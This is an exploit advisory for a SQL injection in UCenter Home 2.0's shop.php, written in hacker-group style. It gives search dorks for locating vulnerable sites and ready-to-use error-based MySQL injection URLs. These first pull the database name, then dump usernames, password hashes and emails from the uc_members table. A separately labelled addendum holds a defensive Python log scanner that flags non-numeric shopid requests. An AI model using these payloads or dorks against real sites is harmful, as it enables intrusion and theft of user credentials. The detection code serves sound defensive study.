__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home

Version : 2.0

Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view

Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php

Values : (?)ac=view&shopid=

Vulnerable Style : SQL Injection (MySQL Error Based)

Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

To inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okay.

Edit in your DB `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okay.

Use hex conversion, and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
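
Added example, not part of the original advisory: a log check for defenders that flags requests to shop.php whose shopid is anything other than a plain integer, which is the condition this injection depends on. The combined access-log format, the marker list and the sample entries are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line of a combined-format access log entry (raw spaces tolerated).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
# SQL fragments that appear in the advisory's error-based payload.
MARKERS = ("information_schema", "floor(rand(", "concat(", "group by", "select")

def inspect_line(line):
    """Return (decoded shopid, matched markers) for a suspicious shop.php hit, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/shop.php"):
        return None
    for raw in parse_qs(url.query, keep_blank_values=True).get("shopid", []):
        value = unquote(raw).strip()        # second decode catches double encoding
        if re.fullmatch(r"[0-9]+", value):  # assumption: a legitimate shopid is a decimal integer
            continue
        lowered = re.sub(r"\s+", " ", value.lower())
        return value, [k for k in MARKERS if k in lowered]
    return None

def scan(lines):
    """Return [(line index, decoded shopid, markers)] for every flagged entry."""
    out = []
    for i, line in enumerate(lines):
        hit = inspect_line(line)
        if hit:
            out.append((i, hit[0], hit[1]))
    return out

# Constructed sample entries (documentation IP addresses, shortened non-working fragments).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%20count(*),floor(rand(0)*2)x%20from%20information_schema.tables%20group%20by%20x) HTTP/1.1" 200 812',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /shop.php?ac=view&shopid=253%2520and%2520(select%25201) HTTP/1.1" 200 812',
    '203.0.113.7 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?shopid=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for idx, value, markers in scan(SAMPLE_LOG):
        print(f"line {idx}: shopid={value!r} markers={markers}")
```

The non-numeric check is the primary signal; the marker list only helps triage, since keyword matching alone is easy to evade.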